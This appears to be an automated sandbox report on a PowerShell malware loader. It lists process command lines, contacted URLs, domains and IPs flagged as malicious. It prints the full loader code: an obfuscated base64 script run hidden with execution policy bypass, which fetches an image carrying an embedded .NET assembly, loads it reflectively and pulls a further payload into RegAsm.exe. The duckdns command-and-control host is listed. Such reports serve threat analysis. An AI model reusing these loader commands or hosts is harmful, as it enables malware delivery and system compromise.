eCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwBwDgTreGEDgTreLwBnDgTreHIDgTrebwDgTreuDgTreGUDgTreYwBuDgTreGUDgTreaQBjDgTreHMDgTrebDgTreBhDgTreG4DgTrebwBpDgTreHQDgTreYQBwDgTreHUDgTreYwBjDgTreG8DgTreagDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBsDgTreGEDgTrebQBwDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/pa/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'lampiro','RegAsm',''))} }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwBwDgTreGEDgTreLwBnDgTreHIDgTrebwDgTreuDgTreGUDgTreYwBuDgTreGUDgTreaQBjDgTreHMDgTrebDgTreBhDgTreG4DgTrebwBpDgTreHQDgTreYQBwDgTreHUDgTreYwBjDgTreG8DgTreagDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBsDgTreGEDgTrebQBwDgTreGkDgTrecgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/pa/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'lampiro','RegAsm',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2272,i,15907534759869138173,17011643453597884883,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1868,i,7095036941938061021,10836526320187100549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 15 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
 malicious
aprilxrwonew8450.duckdns.org
malicious
https://uploaddeimagens.c
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
104.21.45.138
 malicious
https://joccupationalscience.org/ap/xwapri.txt
185.184.154.17
 malicious
http://app01.system.com.br/RDWeb/Pages/login.aspxF
unknown
http://nuget.org/NuGet.exe
unknown
https://pastebin.com/raw/nDU16UcU2H8
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://joccupationalscience.org
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxlp_G
unknown
https://pastebin.com/raw/nDU16UcU
172.67.19.24
https://contoso.com/License
unknown
https://pastebin.com/raw/nDU16UcUicLMEMH
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx;
unknown
https://contoso.com/Icon
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://pastebin.com/raw/nDU16UcU(H.
unknown
https://www.google.com/async/newtab_promos
142.250.190.36
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGMmbv7EGIjA1M1nVZLAVtFVS1FJZIi_5LMmPbtWOrECDQwQLeRMtMGkTzIEOrMpTy5uPF0ejBXoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.190.36
https://github.com/Pester/Pester
unknown
https://pastebin.com/raw/nDU
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxd
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
https://pastebin.com/raw/nDU16UcUj
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
142.250.190.36
http://crl.micro
unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
unknown
https://aka.ms/pscore6lB
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://joccupationalscience.org
unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
142.250.190.36
https://aka.ms/pscore68
unknown
https://pastebin.com/raw/nDU16UcUy1
unknown
https://pastebin.com/
unknown
https://pastebin.com/raw/nDU16UcUC:
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGMmbv7EGIjDxSar4WO0-S0uWb0H8SKABZOs27vCm-xkEEvvoD9N2_qL9rmpaRiHRZ6EwWKo7rWEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
142.250.190.36
There are 33 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
aprilxrwonew8450.duckdns.org
12.221.146.138
 malicious
joccupationalscience.org
185.184.154.17
 malicious
uploaddeimagens.com.br
104.21.45.138
 malicious
www.google.com
142.250.190.36
pastebin.com
172.67.19.24

IPs

IP
Domain
Country
Malicious
104.21.45.138
uploaddeimagens.com.br
United States
malicious
192.168.2.4
unknown
unknown
malicious
12.221.146.138
aprilxrwonew8450.duckdns.org
United States
malicious
185.184.154.17
joccupationalscience.org
United Kingdom
malicious
142.250.190.36
www.google.com
United States
239.255.255.250
unknown
Reserved
172.67.19.24
pastebin.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
